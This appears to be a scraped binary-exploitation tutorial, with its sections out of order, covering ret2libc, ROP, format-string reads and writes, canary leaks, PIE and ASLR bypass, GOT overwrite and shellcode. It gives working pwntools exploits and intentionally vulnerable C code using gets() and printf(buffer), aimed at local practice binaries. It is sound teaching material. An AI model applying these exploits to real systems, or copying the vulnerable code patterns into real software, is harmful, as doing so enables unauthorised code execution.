log.info(p.clean())
p.sendline(payload)
log.info(p.clean())
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
$ strings -a -t x /lib32/libc.so.6 | grep /bin/sh
18c32b /bin/sh
from pwn import *
p = process('./vuln-32')
libc_base = 0xf7dc2000
system = libc_base + 0x44f00
binsh = libc_base + 0x18c32b
payload = b'A' * 76 # The padding
payload += p32(system) # Location of system
payload += p32(0x0) # return pointer - not important once we get the shell
payload += p32(binsh) # pointer to command: /bin/sh
p.clean()
p.sendline(payload)
p.interactive()
$ ROPgadget --binary vuln-64 | grep rdi
[...]
0x00000000004011cb : pop rdi ; ret
from pwn import *
p = process('./vuln-64')
libc_base = 0x7ffff7de5000
system = libc_base + 0x48e20
binsh = libc_base + 0x18a143
POP_RDI = 0x4011cb
payload = b'A' * 72 # The padding
payload += p64(POP_RDI) # gadget -> pop rdi; ret
payload += p64(binsh) # pointer to command: /bin/sh
payload += p64(system) # Location of system
payload += p64(0x0) # return pointer - not important once we get the shell
p.clean()
p.sendline(payload)
p.interactive()
# 32-bit
from pwn import *
elf = context.binary = ELF('./vuln-32')
p = process()
libc = elf.libc # Simply grab the libc it's running with
libc.address = 0xf7dc2000 # Set base address
system = libc.sym['system'] # Grab location of system
binsh = next(libc.search(b'/bin/sh')) # grab string location
payload = b'A' * 76 # The padding
payload += p32(system) # Location of system
payload += p32(0x0) # return pointer - not important once we get the shell
payload += p32(binsh) # pointer to command: /bin/sh
p.clean()
p.sendline(payload)
p.interactive()
No eXecute
The defence against shellcode
As you can expect, programmers were hardly pleased that people could inject their own instructions into the program. The NX bit, which stands for No eXecute, defines areas of memory as either instructions or data. This means that your input will be stored as data, and any attempt to run it as instructions will crash the program, effectively neutralising shellcode.
To get around NX, exploit developers have to leverage a technique called ROP, Return-Oriented Programming.
The Windows version of NX is DEP, which stands for Data Execution Prevention
Checking for NX
You can either use pwntools' checksec or rabin2.
Calling Conventions
A more in-depth look into parameters for 32-bit and 64-bit programs
If we run the 32-bit and 64-bit versions, we get the same output:
Just what we expected.
Analysing 32-bit
Let's open the binary up in radare2 and disassemble it.
If we look closely at the calls to sym.vuln, we see a pattern:
We literally push the parameter to the stack before calling the function. Let's break on sym.vuln.
The first value there is the return pointer that we talked about before - the second, however, is the parameter. This makes sense because the return pointer gets pushed during the call, so it should be at the top of the stack. Now let's disassemble sym.vuln.
Here I'm showing the full output of the command because a lot of it is relevant. radare2 does a great job of detecting local variables - as you can see at the top, there is one called arg_8h. Later this same one is compared to 0xdeadbeef:
Clearly that's our parameter.
So now we know, when there's one parameter, it gets pushed to the stack so that the stack looks like:
Analysing 64-bit
Let's disassemble main again here.
Hohoho, it's different. As we mentioned before, the parameter gets moved to rdi (in the disassembly here it's edi, but edi is just the lower 32 bits of rdi, and the parameter is only 32 bits long, so it says EDI instead). If we break on sym.vuln again we can check rdi with the command
Just dr will display all registers
Awesome.
Registers are used for parameters, but the return address is still pushed onto the stack and in ROP is placed right after the function address
Multiple Parameters
Source
32-bit
We've seen the full disassembly of an almost identical binary, so I'll only isolate the important parts.
It's just as simple - push them in reverse order of how they're passed in. The reverse order becomes helpful when you db sym.vuln and print out the stack.
So it becomes quite clear how more parameters are placed on the stack:
64-bit
So as well as rdi, we also push to rdx and rsi (or, in this case, their lower 32 bits).
Bigger 64-bit values
Just to show that it is in fact ultimately rdi and not edi that is used, I will alter the original one-parameter code to utilise a bigger number:
If you disassemble main, you can see it disassembles to
movabs can be used to encode the mov instruction for 64-bit instructions - treat it as if it's a mov.
PIE
Position Independent Code
Overview
PIE stands for Position Independent Executable, which means that every time you run the file it gets loaded into a different memory address. This means you cannot hardcode values such as function addresses and gadget locations without finding out where they are.
Analysis
Luckily, this does not mean it's impossible to exploit. PIE executables are based around relative rather than absolute addresses, meaning that while the locations in memory are fairly random the offsets between different parts of the binary remain constant. For example, if you know that the function main is located 0x128 bytes in memory after the base address of the binary, and you somehow find the location of main, you can simply subtract 0x128 from this to get the base address and from the addresses of everything else.
Exploitation
So, all we need to do is find a single address and PIE is bypassed. Where could we leak this address from?
The stack of course!
We know that the return pointer is located on the stack - and much like a canary, we can use format string (or other ways) to read the value off the stack. The value will always be a static offset away from the binary base, enabling us to completely bypass PIE!
Double-Checking
Due to the way PIE randomisation works, the base address of a PIE executable will always end in the hexadecimal characters 000. This is because pages are the things being randomised in memory, which have a standard size of 0x1000. Operating Systems keep track of page tables which point to each section of memory and define the permissions for each section, similar to segmentation.
Checking the base address ends in 000 should probably be the first thing you do if your exploit is not working as you expected.
Pwntools, PIE and ROP
As shown in the pwntools ELF tutorial, pwntools has a host of functionality that allows you to really make your exploit dynamic. Simply setting elf.address will automatically update all the function and symbols addresses for you, meaning you don't have to worry about using readelf or other command line tools, but instead can receive it all dynamically.
Not to mention that the ROP capabilities are incredibly powerful as well.
$ checksec vuln
[*] 'vuln'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
Gadgets are small snippets of code followed by a ret instruction, e.g. pop rdi; ret. We can manipulate the ret of these gadgets in such a way as to string together a large chain of them to do what we want.
Example
Let's for a minute pretend the stack looks like this during the execution of a pop rdi; ret gadget.
What happens is fairly obvious - 0x10 gets popped into rdi as it is at the top of the stack during the pop rdi. Once the pop occurs, rsp moves:
And since ret is equivalent to pop rip, 0x5655576724 gets moved into rip. Note how the stack is laid out for this.
Utilising Gadgets
When we overwrite the return pointer, we overwrite the value pointed at by rsp. Once that value is popped, it points at the next value at the stack - but wait. We can overwrite the next value in the stack.
Let's say that we want to exploit a binary to jump to a pop rdi; ret gadget, pop 0x100 into rdi then jump to flag(). Let's step-by-step the execution.
On the originalret, which we overwrite the return pointer for, we pop the gadget address in. Now rip moves to point to the gadget, and rsp moves to the next memory address.
rsp moves to the 0x100; rip to the pop rdi. Now when we pop, 0x100 gets moved into rdi.
RSP moves onto the next items on the stack, the address of flag(). The ret is executed and flag() is called.
Summary
Essentially, if the gadget pops values from the stack, simply place those values afterwards (including the pop rip in ret). If we want to pop 0x10 into rdi and then jump to 0x16, our payload would look like this:
Note if you have multiple pop instructions, you can just add more values.
We use rdi as an example because, if you remember, that's the register for the first parameter in 64-bit. This means control of this register using this gadget is important.
Finding Gadgets
We can use the tool to find possible gadgets.
Combine it with grep to look for specific registers.
Format String Bug
Reading memory off the stack
Format String is a dangerous bug that is easily exploitable. If manipulated correctly, you can leverage it to perform powerful actions such as reading from and writing to arbitrary memory locations.
Why it exists
In C, certain functions can take "format specifier" within strings. Let's look at an example:
This prints out:
So, it replaced %d with the value, %f with the float value and %x with the hex representation.
This is a nice way in C of formatting strings (string concatenation is quite complicated in C). Let's try print out the same value in hex 3 times:
As expected, we get
What happens, however, if we don't have enough arguments for all the format specifiers?
Erm... what happened here?
The key here is that printf expects as many parameters as format string specifiers, and in 32-bit it grabs these parameters from the stack. If there aren't enough parameters on the stack, it'll just grab the next values - essentially leaking values off the stack. And that's what makes it so dangerous.
How to abuse this
Surely if it's a bug in the code, the attacker can't do much, right? Well the real issue is when C code takes user-provided input and prints it out using printf.
If we run this normally, it works at expected:
But what happens if we input format string specifieres, such as %x?
It reads values off the stack and returns them as the developer wasn't expecting so many format string specifiers.
Choosing Offsets
To print the same value 3 times, using
Gets tedious - so, there is a better way in C.
The 1$ between tells printf to use the first parameter. However, this also means that attackers can read values an arbitrary offset from the top of the stack - say we know there is a canary at the 6th %p - instead of sending %p %p %p %p %p %p we can just do %6$p. This allows us to be much more efficient.
Arbitrary Reads
In C, when you want to use a string you use a pointer to the start of the string - this is essentially a value that represents a memory address. So when you use the %s format specifier, it's the pointer that gets passed to it. That means instead of reading a value of the stack, you read the value in the memory address it points at.
Now this is all very interesting - if you can find a value on the stack that happens to correspond to where you want to read, that is. But what if we could specify where we want to read? Well... we can.
Let's look back at the previous program and its output:
You may notice that the last two values contain the hex values of %x . That's because we're reading the buffer. Here it's at the 4th offset - if we can write an address then point %s at it, we can get an arbitrary write!
%p is a pointer; generally, it returns the same as %x just precedes it with a 0x which makes it stand out more
As we can see, we're reading the value we inputted. Let's write a quick pwntools script that write the location of the ELF file and reads it with %s - if all goes well, it should read the first bytes of the file, which is always \x7fELF. Start with the basics:
Nice it works. The base address of the binary is 0x8048000, so let's replace the 0x41424344 with that and read it with %s:
It doesn't work.
The reason it doesn't work is that printf stops at null bytes, and the very first character is a null byte. We have to put the format specifier first.
Let's break down the payload:
We add 4 | because we want the address we write to fill one memory address, not half of one and half another, because that will result in reading the wrong address
The offset is %8$p because the start of the buffer is generally at %6$p. However, memory addresses are 4 bytes long each and we already have 8 bytes, so it's two memory addresses further along at %8$p.
It still stops at the null byte, but that's not important because we get the output; the address is still written to memory, just not printed back.
Now let's replace the p with an s.
Of course, %s will also stop at a null byte as strings in C are terminated with them. We have worked out, however, that the first bytes of an ELF file up to a null byte are \x7fELF\x01\x01\x01.
Arbitrary Writes
Luckily C contains a rarely-used format specifier %n. This specifier takes in a pointer (memory address) and writes there the number of characters written so far. If we can control the input, we can control how many characters are written an also where we write them.
Obviously, there is a small flaw - to write, say, 0x8048000 to a memory address, we would have to write that many characters - and generally buffers aren't quite that big. Luckily there are other format string specifiers for that. I fully recommend you watch to completely understand it, but let's jump into a basic binary.
Simple - we need to overwrite the variable auth with the value 10. Format string vulnerability is obvious, but there's also no buffer overflow due to a secure fgets.
Work out the location of auth
As it's a global variable, it's within the binary itself. We can check the location using readelf to check for symbols.
Location of auth is 0x0804c028.
Writing the Exploit
We're lucky there's no null bytes, so there's no need to change the order.
Buffer is the 7th %p.
And easy peasy:
Pwntools
As you can expect, pwntools has a handy feature for automating %n format string exploits:
The offset in this case is 7 because the 7th %p read the buffer; the location is where you want to write it and the value is what. Note that you can add as many location-value pairs into the dictionary as you want.
You can also grab the location of the auth symbol with pwntools:
Check out the pwntools tutorials for more cool features
Stack Canaries
The Buffer Overflow defence
Stack Canaries are very simple - at the beginning of the function, a random value is placed on the stack. Before the program executes ret, the current value of that variable is compared to the initial: if they are the same, no buffer overflow has occurred.
If they are not, the attacker attempted to overflow to control the return pointer and the program crashes, often with a ***stack smashing detected*** error message.
On Linux, stack canaries end in 00
PIE Bypass with Given Leak
Exploiting PIE with a given leak
The Source
Pretty simple - we print the address of main, which we can read and calculate the base address from. Then, using this, we can calculate the address of win() itself.
int value = 1205;
printf("Decimal: %d\nFloat: %f\nHex: 0x%x", value, (double) value, value);
. This is so that they null-terminate any strings in case you make a mistake when using print functions, but it also makes them much easier to spot.
Bypassing Canaries
There are two ways to bypass a canary.
Leaking it
This is quite broad and will differ from binary to binary, but the main aim is to read the value. The simplest option is using format string if it is present - the canary, like other local variables, is on the stack, so if we can leak values off the stack it's easy.
Source
The source is very simple - it gives you a format string vulnerability, then a buffer overflow vulnerability. The format string we can use to leak the canary value, then we can use that value to overwrite the canary with itself. This way, we can overflow past the canary but not trigger the check as its value remains constant. And of course, we just have to run win().
32-bit
First let's check there is a canary:
Yup, there is. Now we need to calculate at what offset the canary is at, and to do this we'll use radare2.
The last value there is the canary. We can tell because it's roughly 64 bytes after the "buffer start", which should be close to the end of the buffer. Additionally, it ends in 00 and looks very random, unlike the libc and stack addresses that start with f7 and ff. If we count the number of address it's around 24 until that value, so we go one before and one after as well to make sure.
It appears to be at %23$p. Remember, stack canaries are randomised for each new process, so it won't be the same.
Now let's just automate grabbing the canary with pwntools:
Now all that's left is work out what the offset is until the canary, and then the offset from after the canary to the return pointer.
We see the canary is at 0xffea8afc. A little later on the return pointer (we assume) is at 0xffea8b0c. Let's break just after the next gets() and check what value we overwrite it with (we'll use a De Bruijn pattern).
Now we can check the canary and EIP offsets:
Return pointer is 16 bytes after the canary start, so 12 bytes after the canary.
64-bit
Same source, same approach, just 64-bit. Try it yourself before checking the solution.
Remember, in 64-bit format string goes to the relevant registers first and the addresses can fit 8 bytes each so the offset may be different.
Bruteforcing the Canary
This is possible on 32-bit, and sometimes unavoidable. It's not, however, feasible on 64-bit.
As you can expect, the general idea is to run the process loads and load of times with random canary values until you get a hit, which you can differentiate by the presence of a known plaintext, e.g. flag{ and this can take ages to run and is frankly not a particularly interesting challenge.
Let's just run the script to make sure it's the right one :D
Yup, and as we expected, it prints the location of main.
Exploitation
First, let's set up the script. We create an ELF object, which becomes very useful later on, and start the process.
Now we want to take in the main function location. To do this we can simply receive up until it (and do nothing with that) and then read it.
Since we received the entire line except for the address, only the address will come up with p.recvline().
Now we'll use the ELF object we created earlier and set its base address. The sym dictionary returns the offsets of the functions from binary base until the base address is set, after which it returns the absolute address in memory.
In this case, elf.sym['main'] will return 0x11b9; if we ran it again, it would return 0x11b9 + the base address. So, essentially, we're subtracting the offset of main from the address we leaked to get the base of the binary.
Now we know the base we can just call win().
By this point, I assume you know how to find the padding length and other stuff we've been mentioning for a while, so I won't be showing you every step of that.
And does it work?
Awesome!
Final Exploit
Summary
From the leak address of main, we were able to calculate the base address of the binary. From this we could then calculate the address of win and call it.
And one thing I would like to point out is how simple this exploit is. Look - it's 10 lines of code, at least half of which is scaffolding and setup.
64-bit
Try this for yourself first, then feel free to check the solution. Same source, same challenge.
from pwn import *
AUTH = 0x804c028
p = process('./auth')
payload = p32(AUTH)
payload += b'|' * 6 # We need to write the value 10, AUTH is 4 bytes, so we need 6 more for %n
payload += b'%7$n'
print(p.clean().decode('latin-1'))
p.sendline(payload)
print(p.clean().decode('latin-1'))
[+] Starting local process './auth': pid 4045
Password:
[*] Process './auth' stopped with exit code 0 (pid 4045)
(À\x04||||||
Auth is 10
Authenticated!
[*] 'vuln-32'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
[+] Starting local process 'vuln-32': pid 4617
PIE bypassed! Great job :D
from pwn import *
elf = context.binary = ELF('./vuln-32')
p = process()
p.recvuntil('at: ')
main = int(p.recvline(), 16)
elf.address = main - elf.sym['main']
payload = b'A' * 32
payload += p32(elf.sym['win'])
p.sendline(payload)
print(p.clean().decode('latin-1'))
A small issue you may get when pwning on 64-bit systems is that your exploit works perfectly locally but fails remotely - or even fails when you try to use the provided LIBC version rather than your local one. This arises due to something called stack alignment.
Unlike last time, we don't get given a function. We'll have to leak it with format strings.
Analysis
Everything's as we expect.
Exploitation
Setup
As last time, first we set everything up.
PIE Leak
Now we just need a leak. Let's try a few offsets.
3rd one looks like a binary address, let's check the difference between the 3rd leak and the base address in radare2. Set a breakpoint somewhere after the format string leak (doesn't really matter where).
We can see the base address is 0x565ef000 and the leaked value is 0x565f01d5. Therefore, subtracting 0x1d5 from the leaked address should give us the binary. Let's leak the value and get the base address.
Now we just need to send the exploit payload.
Final Exploit
64-bit
Same deal, just 64-bit. Try it out :)
ASLR
Address Space Layout Randomisation
Overview
ASLR stands for Address Space Layout Randomisation and can, in most cases, be thought of as libc's equivalent of PIE - every time you run a binary, libc (and other libraries) get loaded into a different memory address.
While it's tempting to think of ASLR as libc PIE, there is a key difference.
ASLR is a kernel protection while PIE is a binary protection. The main difference is that PIE can be compiled into the binary while the presence of ASLR is completely dependant on the environment running the binary. If I sent you a binary compiled with ASLR disabled while I did it, it wouldn't make any different at all if you had ASLR enabled.
Of course, as with PIE, this means you cannot hardcode values such as function address (e.g. system for a ret2libc).
The Format String Trap
It's tempting to think that, as with PIE, we can simply format string for a libc address and subtract a static offset from it. Sadly, we can't quite do that.
When functions finish execution, they do not get removed from memory; instead, they just get ignored and overwritten. Chances are very high that you will grab one of these remnants with the format string. Different libc versions can act very differently during execution, so a value you just grabbed may not even exist remotely, and if it does the offset will most likely be different (different libcs have different sizes and therefore different offsets between functions). It's possible to get lucky, but you shouldn't really hope that the offsets remain the same.
Instead, a more reliable way is reading the .
Double-Checking
For the same reason as PIE, libc base addresses always end in the hexadecimal characters 000.
PLT and GOT
Bypassing ASLR
The PLT and GOT are sections within an ELF file that deal with a large portion of the dynamic linking. Dynamically linked binaries are more common than statically linked binary in CTFs. The purpose of dynamic linking is that binaries do not have to carry all the code necessary to run within them - this reduces their size substantially. Instead, they rely on system libraries (especially libc, the C standard library) to provide the bulk of the functionality.
For example, each ELF file will not carry their own version of puts compiled within it - it will instead dynamically link to the puts of the system it is on. As well as smaller binary sizes, this also means the user can continually upgrade their libraries, instead of having to redownload all the binaries every time a new version comes out.
ASLR Bypass with Given Leak
The Source
Just as we did for PIE, except this time we print the address of system.
Analysis
Virtual Addresses and Virtual Memory
If we disable ASLR and run two programs side-by-side, we might notice that the libc is loaded into the same address. Contrary to what you might think, these programs are not sharing the same instance of libc!
In fact, even with ASLR off, we can run two different programs and we might still notice that they are loaded into broadly the same part of memory.
The reason for this is is that the addresses we see in a debugger are virtual addresses.
Overview
GOT Overwrite
Hijacking functions
You may remember that the GOT stores the actual locations in libc of functions. Well, if we could overwrite an entry, we could gain code execution that way. Imagine the following code:
Not only is there a buffer overflow and format string vulnerability here, but say we used that format string to overwrite the GOT entry of printf with the location of system. The code would essentially look like the following:
Bit of an issue? Yes. Our input is being passed directly to system.
ret2plt ASLR bypass
Overview
This time around, there's no leak. You'll have to use the ret2plt technique explained previously. Feel free to have a go before looking further on.
RELRO
Relocation Read-Only
RELRO is a protection to stop any GOT overwrites from taking place, and it does so very effectively. There are two types of RELRO, which are both easy to understand.
Partial RELRO
Partial RELRO simply moves the GOT above the program's variables, meaning you can't overflow into the GOT. This, of course, does not prevent format string overwrites.
$ ROPgadget --binary vuln-64
Gadgets information
============================================================
0x0000000000401069 : add ah, dh ; nop dword ptr [rax + rax] ; ret
0x000000000040109b : add bh, bh ; loopne 0x40110a ; nop ; ret
0x0000000000401037 : add byte ptr [rax], al ; add byte ptr [rax], al ; jmp 0x401024
[...]
$ ROPgadget --binary vuln-64 | grep rdi
0x0000000000401096 : or dword ptr [rdi + 0x404030], edi ; jmp rax
0x00000000004011db : pop rdi ; ret
#include <stdio.h>
void vuln() {
char buffer[20];
printf("What's your name?\n");
gets(buffer);
printf("Nice to meet you ");
printf(buffer);
printf("\n");
puts("What's your message?");
gets(buffer);
}
int main() {
vuln();
return 0;
}
void win() {
puts("PIE bypassed! Great job :D");
}
When a program and its libraries are started up, they are loaded into a Virtual Address Space (VAS). Addresses in the VAS are then mapped to real, physical locations in RAM!
This means that if you have two separate programs both loaded at 0x5655523fa000, this address actually corresponds to two different locations in RAM. The OS handles the translation by using the processor's Memory Management Unit (MMU), and the actual memory location differs for each process.
In fact, as the OS is what handles the mapping from virtual addresses to physical addresses, the executable itself only sees virtual addresses! So when pointers are printed out and display virtual addresses, that is not the program handling a layer of abstraction away from you, it genuinely treats pointers in that way. The abstraction is another layer deep.
The Kernel
The kernel only has one continguous virtual address space, so all processes running in kernel mode can see one another (and all user mode programs as well!). In fact, the reason programs are loaded in lower addresses is that in Linux the higher addresses are reserved for the kernel. This is why, later on, you will see drivers loaded at addresses starting with 0xffff...
Benefits
Virtual addressing has three main benefits.
Contiguous Memory Allocation
While physical RAM may not have a sufficient chunk of contiguous memory for a program, virtual addressing allows us to pretend as if it does, loading large programs into what seems to be one large chunk. The corresponding physical addresses, of course, could really be spread out all over memory. Virtual addresses mean we do not have to worry about such problems.
Strict Process Isolation
Processes cannot interfere with the address space of another process, creating a stronger security sandbox.
Allocate More Memory than we have RAM
When the physical memory (RAM) is filled up, the OS will move inactive pages in memory to the swap space, which is located on the hard drive. The idea is that, in times of large memory usage, the hard drive acts as a sort of "RAM overflow". Swapped memory is much, much slower than RAM, which is why inactive memory pages are the ones moved. This allows the Operating System to handle low memory gracefully and without crashing. Virtual addressing allows developers to not think about this happening, as the address translation done by the OS via the MMU will automatically map the corresponding virtual addresses to hard drive addresses.
Full RELRO
Full RELRO makes the GOT completely read-only, so even format string exploits cannot overwrite it. This is not the default in binaries due to the fact that it can make it take much longer to load as it need to resolve all the function addresses at once.
The problem with shellcode exploits as they are is that the locations of it are questionable - wouldn't it be cool if we could control where we wrote it to?
Well, we can.
Instead of writing shellcode directly, we can instead use some ROP to take in input again - except this time, we specify the location as somewhere we control.
Using ESP
If you think about it, once the return pointer is popped off the stack ESP will points at whatever is after it in memory - after all, that's the entire basis of ROP. But what if we put shellcode there?
It's a crazy idea. But remember, ESP will point there. So what if we overwrite the return pointer with a jmp esp gadget! Once it gets popped off, ESP will point at the shellcode and thanks to the jmp esp it will be executed!
ret2reg
ret2reg extends the use of jmp esp to the use of any register that happens to point somewhere you need it to.
ret = elf.address + 0x2439
[...]
rop.raw(POP_RDI)
rop.raw(0x4) # first parameter
rop.raw(ret) # align the stack
rop.raw(system)
Your address of system might end in different characters - you just have a different libc version
Exploitation
Much of this is as we did with PIE.
Note that we include the libc here - this is just another ELF object that makes our lives easier.
Parse the address of system and calculate libc base from that (as we did with PIE):
Now we can finally ret2libc, using the libcELF object to really simplify it for us:
Final Exploit
64-bit
Try it yourself :)
Using pwntools
If you prefer, you could have changed the following payload to be more pwntoolsy:
Instead, you could do:
The benefit of this is it's (arguably) more readable, but also makes it much easier to reuse in 64-bit exploits as all the parameters are automatically resolved for you.
We're going to have to leak ASLR base somehow, and the only logical way is a ret2plt. We're not struggling for space as gets() takes in as much data as we want.
Exploitation
All the basic setup
Now we want to send a payload that leaks the real address of puts. As mentioned before, calling the PLT entry of a function is the same as calling the function itself; if we point the parameter to the GOT entry, it'll print out it's actual location. This is because in C string arguments for functions actually take a pointer to where the string can be found, so pointing it to the GOT entry (which we know the location of) will print it out.
But why is there a main there? Well, if we set the return address to random jargon, we'll leak libc base but then it'll crash; if we call main again, however, we essentially restart the binary - except we now know libc base so this time around we can do a ret2libc.
Remember that the GOT entry won't be the only thing printed - puts, and most functions in C, print until a null byte. This means it will keep on printing GOT addresses, but the only one we care about is the first one, so we grab the first 4 bytes and use u32() to interpret them as a little-endian number. After that we ignore the the rest of the values as well as the Come get me from calling main again.
From here, we simply calculate libc base again and perform a basic ret2libc:
And bingo, we have a shell!
Final Exploit
64-bit
You know the drill - try the same thing for 64-bit. If you want, you can use pwntools' ROP capabilities - or, to make sure you understand calling conventions, be daring and do both :P
$ ./vuln-32
What's your name?
%p
Nice to meet you 0xf7f6d080
What's your message?
hello
from pwn import *
elf = context.binary = ELF('./vuln-32')
p = process()
$ ./vuln-32
What's your name?
%p %p %p %p %p
Nice to meet you 0xf7eee080 (nil) 0x565d31d5 0xf7eb13fc 0x1
$ r2 -d -A vuln-32
Process with PID 5548 started...
= attach 5548 5548
bin.baddr 0x565ef000
0x565f01c9]> db 0x565f0234
[0x565f01c9]> dc
What's your name?
%3$p
Nice to meet you 0x565f01d5
p.recvuntil('name?\n')
p.sendline('%3$p')
p.recvuntil('you ')
elf_leak = int(p.recvline(), 16)
elf.address = elf_leak - 0x11d5
log.success(f'PIE base: {hex(elf.address)}') # not required, but a nice check
So when it's on a new system, it replaces function calls with hardcoded addresses?
Not quite.
The problem with this approach is it requires libc to have a constant base address, i.e. be loaded in the same area of memory every time it's run, but remember that ASLRexists. Hence the need for dynamic linking. Due to the way ASLR works, these addresses need to be resolved every time the binary is run. Enter the PLT and GOT.
The PLT and GOT
The PLT (Procedure Linkage Table) and GOT (Global Offset Table) work together to perform the linking.
When you call puts() in C and compile it as an ELF executable, it is not actuallyputs() - instead, it gets compiled as puts@plt. Check it out in GDB:
Why does it do that?
Well, as we said, it doesn't know where puts actually is - so it jumps to the PLT entry of puts instead. From here, puts@plt does some very specific things:
If there is a GOT entry for puts, it jumps to the address stored there.
If there isn't a GOT entry, it will resolve it and jump there.
The GOT is a massive table of addresses; these addresses are the actual locations in memory of the libc functions. puts@got, for example, will contain the address of puts in memory. When the PLT gets called, it reads the GOT address and redirects execution there. If the address is empty, it coordinates with the ld.so (also called the dynamic linker/loader) to get the function address and stores it in the GOT. This is done by calling _dl_runtime_resolve (this is explained in more detail in the ret2dlresolve section).
How is this useful for binary exploitation?
Well, there are two key takeaways from the above explanation:
Calling the PLT address of a function is equivalent to calling the function itself
The GOT address contains addresses of functions in libc, and the GOT is within the binary.
The use of the first point is clear - if we have a PLT entry for a desirable libc function, for example system, we can just redirect execution to its PLT entry and it will be the equivalent of calling system directly; no need to jump into libc.
The second point is less obvious, but debatably even more important. As the GOT is part of the binary, it will always be a constant offset away from the base. Therefore, if PIE is disabled or you somehow leak the binary base, you know the exact address that contains a libc function's address. If you perhaps have an arbitrary read, it's trivial to leak the real address of the libc function and therefore bypass ASLR.
Exploiting an Arbitrary Read
There are two main ways that one can exploit an arbitrary read for a stack exploit. Note that these approaches will cause not only the GOT entry to be return but everything else until a null byte is reached as well, due to strings in C being null-terminated; make sure you only take the required number of bytes.
ret2plt
A ret2plt is a common technique that involves calling puts@plt and passing the GOT entry of puts as a parameter. This causes puts to print out its own address in libc. You then set the return address to the function you are exploiting in order to call it again and enable you to
flat() packs all the values you give it with p32() and p64() (depending on context) and concatenates them, meaning you don't have to write the packing functions out all the time
%s format string
This has the same general theory but is useful when you have limited stack space or a ROP chain would alter the stack in such a way to complicate future payloads, for example when stack pivoting.
Summary
The PLT and GOT do the bulk of static linking
The PLT resolves actual locations in libc of functions you use and stores them in the GOT
Next time that function is called, it reads the address in GOT entry and calls it
Calling function@plt is equivalent to calling the function itself
An arbitrary read enables you to read the GOT and thus bypass ASLR by calculating libc base
ROP and Shellcode
Source
Super standard binary.
Exploitation
One Gadgets and Malloc Hook
Quick shells and pointers
A one_gadget is simply an execve("/bin/sh") command that is present in gLIBC, and this can be a quick win with GOT overwrites - next time the function is called, the one_gadget is executed and the shell is popped.
__malloc_hook is a feature in C. The defines __malloc_hook as:
The value of this variable is a pointer to the function that malloc
Using ret2reg
Source
Any function that returns a pointer to the string once it acts on it is a prime target. There are many that do this, including stuff like gets(), strcpy() and fgets(). We''l keep it simple and use gets() as an example.
payload = p32(elf.got['puts']) # p64() if 64-bit
payload += b'|'
payload += b'%3$s' # The third parameter points at the start of the buffer
# this part is only relevant if you need to call the function again
payload = payload.ljust(40, b'A') # 40 is the offset until you're overwriting the instruction pointer
payload += p32(elf.symbols['main'])
# Send it off...
p.recvuntil(b'|') # This is not required
puts_leak = u32(p.recv(4)) # 4 bytes because it's 32-bit
Syscalls
Interfacing directly with the kernel
Overview
A syscall is a system call, and is how the program enters the kernel in order to carry out specific tasks such as creating processes, I/O and any others they would require kernel-level access.
Browsing the list of syscalls, you may notice that certain syscalls are similar to libc functions such as open(), fork() or read(); this is because these functions are simply wrappers around the syscalls, making it much easier for the programmer.
Triggering Syscalls
On Linux, a syscall is triggered by the int80 instruction. Once it's called, the kernel checks the value stored in RAX - this is the syscall number, which defines what syscall gets run. As per the table, the other parameters can be stored in RDI, RSI, RDX, etc and every parameter has a different meaning for the different syscalls.
Execve
A notable syscall is the execve syscall, which executes the program passed to it in RDI. RSI and RDX hold arvp and envp respectively.
This means, if there is no system() function, we can use execve to call /bin/sh instead - all we have to do is pass in a pointer to /bin/sh to RDI, and populate RSI and RDX with 0 (this is because both argv and envp need to be NULL to pop a shell).
ret2reg
Using Registers to bypass ASLR
ret2reg simply involves jumping to register addresses rather than hardcoded addresses, much like Using RSP for Shellcode. For example, you may find RAX always points at your buffer when the ret is executed, so you could utilise a call rax or jmp rax to continue from there.
The reason RAX is the most common for this technique is that, by convention, the return value of a function is stored in RAX. For example, take the following basic code:
#include <stdio.h>
int test() {
return 0xdeadbeef;
}
int main() {
test();
return 0;
}
If we compile and disassemble the function, we get this:
As you can see, the value 0xdeadbeef is being moved into EAX.
Let's get all the basic setup done.
Now we're going to do something interesting - we are going to call gets again. Most importantly, we will tell gets to write the data it receives to a section of the binary. We need somewhere both readable and writeable, so I choose the GOT. We pass a GOT entry to gets, and when it receives the shellcode we send it will write the shellcode into the GOT. Now we know exactly where the shellcode is. To top it all off, we set the return address of our call to gets to where we wrote the shellcode, perfectly executing what we just inputted.
Final Exploit
64-bit
I wonder what you could do with this.
ASLR
No need to worry about ASLR! Neither the stack nor libc is used, save for the ROP.
The real problem would be if PIE was enabled, as then you couldn't call gets as the location of the PLT would be unknown without a leak - same problem with writing to the GOT.
Potential Problems
Thank to clubby789and Faithfrom the HackTheBox Discord server, I found out that the GOT often has Executable permissions simply because that's the default permissions when there's no NX. If you have a more recent kernel, such as 5.9.0, the default is changed and the GOT will not have X permissions.
As such, if your exploit is failing, run uname -r to grab the kernel version and check if it's 5.9.0; if it is, you'll have to find another RWX region to place your shellcode (if it exists!).
To summarise, when you call malloc() the function __malloc_hook points to also gets called - so if we can overwrite this with, say, a one_gadget, and somehow trigger a call to malloc(), we can get an easy shell.
Finding One_Gadgets
Luckily there is a tool written in Ruby called one_gadget. To install it, run:
And then you can simply run
For most one_gadgets, certain criteria have to be met. This means they won't all work - in fact, none of them may work.
Triggering malloc()
Wait a sec - isn't malloc() a heap function? How will we use it on the stack? Well, you can actually trigger malloc by calling printf("%10000$c") (this allocates too many bytes for the stack, forcing libc to allocate the space on the heap instead). So, if you have a format string vulnerability, calling malloc is trivial.
Practise
This is a hard technique to give you practise on, due to the fact that your libc version may not even have working one_gadgets. As such, feel free to play around with the GOT overwrite binary and see if you can get a one_gadget working.
Remember, the value given by the one_gadget tool needs to be added to libc base as it's just an offset.
#include <stdio.h>
void vuln() {
char buffer[20];
puts("Give me the input");
gets(buffer);
}
int main() {
vuln();
return 0;
}
from pwn import *
elf = context.binary = ELF('./vuln-32')
p = process()
rop = ROP(elf)
rop.raw('A' * 32)
rop.gets(elf.got['puts']) # Call gets, writing to the GOT entry of puts
rop.raw(elf.got['puts']) # now our shellcode is written there, we can continue execution from there
p.recvline()
p.sendline(rop.chain())
p.sendline(asm(shellcraft.sh()))
p.interactive()
from pwn import *
elf = context.binary = ELF('./vuln-32')
p = process()
rop = ROP(elf)
rop.raw('A' * 32)
rop.gets(elf.got['puts']) # Call gets, writing to the GOT entry of puts
